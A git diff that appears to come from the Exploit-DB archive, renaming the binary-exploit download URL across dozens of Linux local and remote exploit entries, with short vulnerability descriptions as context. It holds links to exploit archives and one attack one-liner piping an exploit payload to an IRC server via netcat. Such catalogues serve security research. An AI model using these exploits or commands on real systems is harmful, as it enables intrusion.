9917ca7c9..997955f4e 100644 --- a/exploits/linux/local/44205.md +++ b/exploits/linux/local/44205.md @@ -13,4 +13,4 @@ $ make # Reference [Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/) -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44205.zip \ No newline at end of file diff --git a/exploits/linux/local/44300.c b/exploits/linux/local/44300.c index ad4a9916c..a679c8a61 100644 --- a/exploits/linux/local/44300.c +++ b/exploits/linux/local/44300.c @@ -1,5 +1,5 @@ /** - EDB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44300.zip + EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44300.zip Video ~ https://www.youtube.com/watch?v=qchiJn94kTo **/ diff --git a/exploits/linux/local/45372.txt b/exploits/linux/local/45372.txt index 95751bf48..6d4f24ad6 100644 --- a/exploits/linux/local/45372.txt +++ b/exploits/linux/local/45372.txt @@ -11,4 +11,4 @@ The proof-of-concept exploit code with process continuation and connect back ove https://www.voidsecurity.in/2018/08/from-compiler-optimization-to-code.html https://github.com/renorobert/virtualbox-cve-2018-2844 -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45372.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45372.zip \ No newline at end of file diff --git a/exploits/linux/local/45407.txt b/exploits/linux/local/45407.txt index 43160faea..7955913f3 100644 --- a/exploits/linux/local/45407.txt +++ b/exploits/linux/local/45407.txt @@ -288,4 +288,4 @@ uid=1000(gjannhtest1) gid=1000(gjannhtest1) groups=1000(gjannhtest1),20(dialout) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45407.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45407.zip \ No newline at end of file diff --git a/exploits/linux/local/7855.txt b/exploits/linux/local/7855.txt index bb0ef4437..f70e1dbc1 100644 --- a/exploits/linux/local/7855.txt +++ b/exploits/linux/local/7855.txt @@ -3,6 +3,6 @@ PostgreSQL UDF for command execution [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz -mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz) +mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz) # milw0rm.com [2009-01-25] \ No newline at end of file diff --git a/exploits/linux/local/7856.txt b/exploits/linux/local/7856.txt index 50c373a4f..8d63eee44 100644 --- a/exploits/linux/local/7856.txt +++ b/exploits/linux/local/7856.txt @@ -3,6 +3,6 @@ MySQL UDF for command execution [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz -mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz) +mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz) # milw0rm.com [2009-01-25] \ No newline at end of file diff --git a/exploits/linux/local/9191.txt b/exploits/linux/local/9191.txt index e51bc8c11..703a12c1b 100644 --- a/exploits/linux/local/9191.txt +++ b/exploits/linux/local/9191.txt @@ -301,6 +301,6 @@ http://grsecurity.net/~spender/cheddar_bay.tgz -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9191.tgz (2009-cheddar_bay.tgz) +backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9191.tgz (2009-cheddar_bay.tgz) # milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/exploits/linux/local/9208.txt b/exploits/linux/local/9208.txt index 8f6d0f5b2..4f905e8ec 100644 --- a/exploits/linux/local/9208.txt +++ b/exploits/linux/local/9208.txt @@ -50,6 +50,6 @@ i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz GenuineIntel GNU/Linux ------------------------------------ -download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz) +download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz) # milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/exploits/linux/local/9435.txt b/exploits/linux/local/9435.txt index e933012ef..905e73591 100644 --- a/exploits/linux/local/9435.txt +++ b/exploits/linux/local/9435.txt @@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4 */ http://www.grsecurity.net/~spender/wunderbar_emporium.tgz -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz (2009-wunderbar_emporium.tgz) +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9435.tgz (2009-wunderbar_emporium.tgz) # milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/exploits/linux/local/9436.txt b/exploits/linux/local/9436.txt index 43f5c62bb..699f4a2b6 100644 --- a/exploits/linux/local/9436.txt +++ b/exploits/linux/local/9436.txt @@ -4,6 +4,6 @@ Quick and dirty exploit for this one: http://www.frasunek.com/proto_ops.tgz -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz (2009-proto_ops.tgz) +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9436.tgz (2009-proto_ops.tgz) # milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/exploits/linux/local/9574.txt b/exploits/linux/local/9574.txt index 385fca037..7c0ef303d 100644 --- a/exploits/linux/local/9574.txt +++ b/exploits/linux/local/9574.txt @@ -16,6 +16,6 @@ */ main: http://grsecurity.net/~spender/therebel.tgz -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz (2009-therebel.tgz) +back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9574.tgz (2009-therebel.tgz) # milw0rm.com [2009-09-02] \ No newline at end of file diff --git a/exploits/linux/local/9598.txt b/exploits/linux/local/9598.txt index 5b626a67c..e08624a13 100644 --- a/exploits/linux/local/9598.txt +++ b/exploits/linux/local/9598.txt @@ -5,6 +5,6 @@ systems, it automatically searches in the SELinux policy rules for types with mmap_zero permission it can transition, and tries to exploit the system with that types. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz) # milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/exploits/linux/local/9627.txt b/exploits/linux/local/9627.txt index b381a2260..c2478e2e6 100644 --- a/exploits/linux/local/9627.txt +++ b/exploits/linux/local/9627.txt @@ -37,6 +37,6 @@ */ http://www.grsecurity.net/~spender/enlightenment.tgz -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9627.tgz (2009-enlightenment.tgz) +back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9627.tgz (2009-enlightenment.tgz) # milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/exploits/linux/local/9641.txt b/exploits/linux/local/9641.txt index 1ce71e88c..0c7a2131e 100644 --- a/exploits/linux/local/9641.txt +++ b/exploits/linux/local/9641.txt @@ -4,6 +4,6 @@ pointer workaround for data items addressing on ppc64 (i.e. functions on exploit code and libc can be referenced); Improved search and transition to SELinux types with mmap_zero permission. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz) # milw0rm.com [2009-09-11] \ No newline at end of file diff --git a/exploits/linux/local/9844.py b/exploits/linux/local/9844.py index 24a6cf4b3..26efab184 100755 --- a/exploits/linux/local/9844.py +++ b/exploits/linux/local/9844.py @@ -3,7 +3,7 @@ # PoC by Matthew Bergin # Bugtraq ID: 36901 # -# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/82/files +# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/82/files import os import time diff --git a/exploits/linux/remote/19522.txt b/exploits/linux/remote/19522.txt index 3ad7437f2..d88120527 100644 --- a/exploits/linux/remote/19522.txt +++ b/exploits/linux/remote/19522.txt @@ -4,4 +4,4 @@ A vulnerability in the Linux kernel allows remote users to guess the initial seq The function 'secure_tcp_sequence_number' in the file 'drivers/char/random.c' at line 1684 is used to generate the initial sequence number. It used the MD4 hash with a set of inputs to generate the new ISN. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19522.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19522.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/19892.txt b/exploits/linux/remote/19892.txt index 1eb6c2f50..e6647517a 100644 --- a/exploits/linux/remote/19892.txt +++ b/exploits/linux/remote/19892.txt @@ -4,4 +4,4 @@ A vulnerability exists in the DNS decode capabilities provided as part of the tc When tcpdump is logging to a file, it is not affected by this vulnerability. Upon reading from a file which contains recorded packets, it will enter an infinite loop when it encounters packets of this type. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19892.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19892.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/20924.txt b/exploits/linux/remote/20924.txt index 2088b6fc4..d02d47f9d 100644 --- a/exploits/linux/remote/20924.txt +++ b/exploits/linux/remote/20924.txt @@ -4,4 +4,4 @@ MDBMS is a free relational database management system. A buffer overflow condition exists in MDBMS. By issuing the '\s' command to display the query buffer when it contains a large amount of data, it may be possible for a remote user to trigger this condition and execute arbitrary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20924.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20924.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/21210.txt b/exploits/linux/remote/21210.txt index 9c7c0c417..7981c6d39 100644 --- a/exploits/linux/remote/21210.txt +++ b/exploits/linux/remote/21210.txt @@ -8,4 +8,4 @@ Although this vulnerability exists in recent versions of X-Chat, the option to e cat 21210.exploit - | netcat server 6667 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21210.exploit \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21210.exploit \ No newline at end of file diff --git a/exploits/linux/remote/21402.txt b/exploits/linux/remote/21402.txt index 6639ec1b9..a52bbad9a 100644 --- a/exploits/linux/remote/21402.txt +++ b/exploits/linux/remote/21402.txt @@ -4,4 +4,4 @@ A buffer overflow condition exists in the OpenSSH server. The condition is explo The vulnerability is related to the handling of Kerberos 4 TGT/AFS tokens passed by the client. An unbounded string copy operation may result in a stack overflow if the TGT/token data is malformed. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21402.tar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21402.tar \ No newline at end of file diff --git a/exploits/linux/remote/22187.txt b/exploits/linux/remote/22187.txt index 16e3a8778..1f4f75135 100644 --- a/exploits/linux/remote/22187.txt +++ b/exploits/linux/remote/22187.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6650/info CVS is prone to a double free vulnerability in the Directory requests. An attacker may potentially take advantage of this issue to cause heap memory to be corrupted with attacker-supplied values, which may result in execution of arbitrary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22187.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22187.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/22264.txt b/exploits/linux/remote/22264.txt index 132b13372..e94757d1f 100644 --- a/exploits/linux/remote/22264.txt +++ b/exploits/linux/remote/22264.txt @@ -6,4 +6,4 @@ The information loss was reduced in OpenSSL versions 0.9.6i and 0.9.7a. It is no *It should be noted that this attack is reportedly difficult to exploit and requires that the adversary be a man-in-the-middle. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22264.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22264.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/22584.txt b/exploits/linux/remote/22584.txt index 39ed81956..50d3e1514 100644 --- a/exploits/linux/remote/22584.txt +++ b/exploits/linux/remote/22584.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7550/info Info-ZIP UnZip contains a vulnerability during the handling of pathnames for archived files. Specifically, when certain encoded characters are inserted into '../' directory traversal sequences, the creator of the archive can cause the file to be extracted to arbitrary locations on the filesystem - including paths containing system binaries and other sensitive or confidential information. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22584.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22584.zip \ No newline at end of file diff --git a/exploits/linux/remote/23082.txt b/exploits/linux/remote/23082.txt index fdf731474..ff31e1250 100644 --- a/exploits/linux/remote/23082.txt +++ b/exploits/linux/remote/23082.txt @@ -1,4 +1,4 @@ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23082.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23082.zip SSH Tectia Remote Authentication Bypass Tectia is the commercial OpenSSH solution. The product can be found at: diff --git a/exploits/linux/remote/23728.txt b/exploits/linux/remote/23728.txt index 66540b482..79c96d2c6 100644 --- a/exploits/linux/remote/23728.txt +++ b/exploits/linux/remote/23728.txt @@ -2,12 +2,12 @@ source: http://www.securityfocus.com/bid/9692/info Metamail has been reported prone to multiple vulnerabilities that may provide for arbitrary code execution. Two buffer overflow vulnerabilities have been reported to affect Metamail. Additionally, two format string-handling vulnerabilities have been reported. These issues may also be exploited by a remote attacker to execute arbitrary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-1.splitmail +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-1.splitmail -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-2.tgz +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-2.tgz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-3 +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-3 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-4 +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-4 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-5 \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-5 \ No newline at end of file diff --git a/exploits/linux/remote/23881.txt b/exploits/linux/remote/23881.txt index e76cd94cc..709a55018 100644 --- a/exploits/linux/remote/23881.txt +++ b/exploits/linux/remote/23881.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9974/info Multiple locally and remotely exploitable buffer overrun and format strings were reported in emil. This could permit execution of arbitrary code in the context of the software. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23881.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23881.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/24784.txt b/exploits/linux/remote/24784.txt index 92f348a99..34fb5c459 100644 --- a/exploits/linux/remote/24784.txt +++ b/exploits/linux/remote/24784.txt @@ -4,4 +4,4 @@ The file command is affected by a buffer overflow vulnerability. This issue is d An attacker may leverage this issue to execute arbitrary code with the privileges of a user that processes the malicious file with the affected utility. This may be leveraged to escalate privileges or to gain unauthorized access. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24784.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24784.zip \ No newline at end of file diff --git a/exploits/linux/remote/24848.txt b/exploits/linux/remote/24848.txt index a3886df25..e2ef1a5e9 100644 --- a/exploits/linux/remote/24848.txt +++ b/exploits/linux/remote/24848.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through ChBg, the attacker-supplied ChBg 1.5 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24848.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24848.zip \ No newline at end of file diff --git a/exploits/linux/remote/24852.txt b/exploits/linux/remote/24852.txt index 11624b050..71a6e6572 100644 --- a/exploits/linux/remote/24852.txt +++ b/exploits/linux/remote/24852.txt @@ -4,4 +4,4 @@ A remote client-side buffer overflow vulnerability affects mpg123. This issue is An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24852.list \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24852.list \ No newline at end of file diff --git a/exploits/linux/remote/24977.txt b/exploits/linux/remote/24977.txt index 56223eecf..c137d6073 100644 --- a/exploits/linux/remote/24977.txt +++ b/exploits/linux/remote/24977.txt @@ -4,7 +4,7 @@ CUPS is reported prone to a remote buffer overflow vulnerability. The issue is r A remote attacker may exploit this condition to execute arbitrary code in the context of the vulnerable CUPS daemon. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24977.gz +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24977.gz diff --git a/exploits/linux/remote/24978.txt b/exploits/linux/remote/24978.txt index efd56e219..323ace31c 100644 --- a/exploits/linux/remote/24978.txt +++ b/exploits/linux/remote/24978.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/11969/info It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer. The overflow condition presents itself in the 'demux_aiff.c' file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24978.avi \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24978.avi \ No newline at end of file diff --git a/exploits/linux/remote/25005.txt b/exploits/linux/remote/25005.txt index 607206bbb..59da9b572 100644 --- a/exploits/linux/remote/25005.txt +++ b/exploits/linux/remote/25005.txt @@ -4,4 +4,4 @@ NASM is prone to a buffer overflow. This condition is exposed when the applicati Successful exploitation will permit arbitrary code execution with the privileges of the user running the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25005.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25005.zip \ No newline at end of file diff --git a/exploits/linux/remote/25006.txt b/exploits/linux/remote/25006.txt index a384db311..08063363e 100644 --- a/exploits/linux/remote/25006.txt +++ b/exploits/linux/remote/25006.txt @@ -4,4 +4,4 @@ It is reported that rtf2latex2e is susceptible to a stack buffer overflow vulner This vulnerability allows remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read the malicious RTF file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25006.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25006.zip \ No newline at end of file diff --git a/exploits/linux/remote/25008.txt b/exploits/linux/remote/25008.txt index 7bc9f842c..e1548d84d 100644 --- a/exploits/linux/remote/25008.txt +++ b/exploits/linux/remote/25008.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue by crafting a malicious message that contains LinPopUp version 1.2.0 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25008.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25008.zip \ No newline at end of file diff --git a/exploits/linux/remote/25010.txt b/exploits/linux/remote/25010.txt index 558af59b8..81fdc1dee 100644 --- a/exploits/linux/remote/25010.txt +++ b/exploits/linux/remote/25010.txt @@ -4,4 +4,4 @@ o3read is prone to a buffer overflow vulnerability. This issue is exposed when t Successful exploitation will result in code execution with the privileges of the user running the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25010.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25010.zip \ No newline at end of file diff --git a/exploits/linux/remote/25015.txt b/exploits/linux/remote/25015.txt index fa5765b70..117d92ac4 100644 --- a/exploits/linux/remote/25015.txt +++ b/exploits/linux/remote/25015.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through the application, the attack Ringtone Tools version 2.22 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25015.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25015.zip \ No newline at end of file diff --git a/exploits/linux/remote/25030.txt b/exploits/linux/remote/25030.txt index d8ec5b0de..b1670a708 100644 --- a/exploits/linux/remote/25030.txt +++ b/exploits/linux/remote/25030.txt @@ -4,4 +4,4 @@ GNU UnRTF is prone to a buffer overflow vulnerability. This issue is exposed whe Successful exploitation will result in execution of arbitrary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25030.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25030.zip \ No newline at end of file diff --git a/exploits/linux/remote/25035.txt b/exploits/linux/remote/25035.txt index ed94ce3f5..5183e937a 100644 --- a/exploits/linux/remote/25035.txt +++ b/exploits/linux/remote/25035.txt @@ -4,4 +4,4 @@ PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the Successful exploitation of this issue will result in execution of arbitrary code as the user of the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25035.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25035.zip \ No newline at end of file diff --git a/exploits/linux/remote/25036.txt b/exploits/linux/remote/25036.txt index 317857690..6fcfad2c4 100644 --- a/exploits/linux/remote/25036.txt +++ b/exploits/linux/remote/25036.txt @@ -4,4 +4,4 @@ PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the Successful exploitation of this issue will result in execution of arbitrary code as the user of the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25036.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25036.zip \ No newline at end of file diff --git a/exploits/linux/remote/25150.txt b/exploits/linux/remote/25150.txt index 6593356ef..b6a7a9527 100644 --- a/exploits/linux/remote/25150.txt +++ b/exploits/linux/remote/25150.txt @@ -4,4 +4,4 @@ A remotely exploitable client-side directory-traversal vulnerability affects Win An attacker may leverage this issue by distributing malicious ACE archives to unsuspecting users. This issue will allow an attacker to write files to arbitrary locations on the filesystem with the privileges of an unsuspecting user that extracts the malicious ACE archive. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25150.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25150.zip \ No newline at end of file diff --git a/exploits/linux/remote/26540.txt b/exploits/linux/remote/26540.txt index 406b1d101..750484d6a 100644 --- a/exploits/linux/remote/26540.txt +++ b/exploits/linux/remote/26540.txt @@ -4,4 +4,4 @@ Inkscape is prone to a buffer overflow vulnerability. This issue is due to a fai When the application processes a malformed SVG image file, it results in a buffer overflow. An attacker can exploit this vulnerability to execute arbitrary code in the context of the victim user. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/26540.svg \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26540.svg \ No newline at end of file diff --git a/exploits/linux/remote/29471.txt b/exploits/linux/remote/29471.txt index 8345e65f4..9f0686c74 100644 --- a/exploits/linux/remote/29471.txt +++ b/exploits/linux/remote/29471.txt @@ -6,4 +6,4 @@ A remote attacker can exploit this issue to gain control of mouse and keyboard H Versions prior to 2.25 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29471.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29471.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/29768.txt b/exploits/linux/remote/29768.txt index aeb34b53e..a14707790 100644 --- a/exploits/linux/remote/29768.txt +++ b/exploits/linux/remote/29768.txt @@ -4,4 +4,4 @@ Mozilla Firefox is prone to vulnerability that may allow attackers to obtain pot A successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29768.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29768.zip \ No newline at end of file diff --git a/exploits/linux/remote/29769.txt b/exploits/linux/remote/29769.txt index db149814a..56307509b 100644 --- a/exploits/linux/remote/29769.txt +++ b/exploits/linux/remote/29769.txt @@ -4,4 +4,4 @@ Opera is prone to vulnerability that may allow attackers to obtain potentially s A successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29769.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29769.zip \ No newline at end of file diff --git a/exploits/linux/remote/29770.txt b/exploits/linux/remote/29770.txt index d3c9af538..5fc7386d1 100644 --- a/exploits/linux/remote/29770.txt +++ b/exploits/linux/remote/29770.txt @@ -4,4 +4,4 @@ KDE Konqueror is prone to a vulnerability that may allow attackers to obtain pot A successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29770.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29770.zip \ No newline at end of file diff --git a/exploits/linux/remote/30043.txt b/exploits/linux/remote/30043.txt index 7558fec5b..30aa201cb 100644 --- a/exploits/linux/remote/30043.txt +++ b/exploits/linux/remote/30043.txt @@ -6,7 +6,7 @@ An attacker can exploit these issues to crash the affected application, effectiv Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30043.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30043.zip CVE: 2007-2788 & 2007-2789 OSVDB-ID: 36199 & 36200 \ No newline at end of file diff --git a/exploits/linux/remote/30089.txt b/exploits/linux/remote/30089.txt index 447915c63..f4a9f3aac 100644 --- a/exploits/linux/remote/30089.txt +++ b/exploits/linux/remote/30089.txt @@ -6,4 +6,4 @@ Attacker-supplied script code would run in the context of the affected site, pot This issue affects Ruby on Rails 1.2.3; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30089.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30089.tgz \ No newline at end of file diff --git a/exploits/linux/remote/30142.txt b/exploits/linux/remote/30142.txt index 2c3bbf75b..5fff48087 100644 --- a/exploits/linux/remote/30142.txt +++ b/exploits/linux/remote/30142.txt @@ -4,4 +4,4 @@ GDB is prone to a buffer-overflow vulnerability because it fails to properly che Attackers could leverage this issue to run arbitrary code outside of a restricted environment, which may lead to privilege escalation. Symantec has not confirmed code execution. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30142.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30142.zip \ No newline at end of file diff --git a/exploits/linux/remote/3021.txt b/exploits/linux/remote/3021.txt index 6d72f977a..2c749b820 100644 --- a/exploits/linux/remote/3021.txt +++ b/exploits/linux/remote/3021.txt @@ -2,6 +2,6 @@ # solareclipse at phreedom dot org # GPG key ID: E36B11B7 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3021.tar.gz 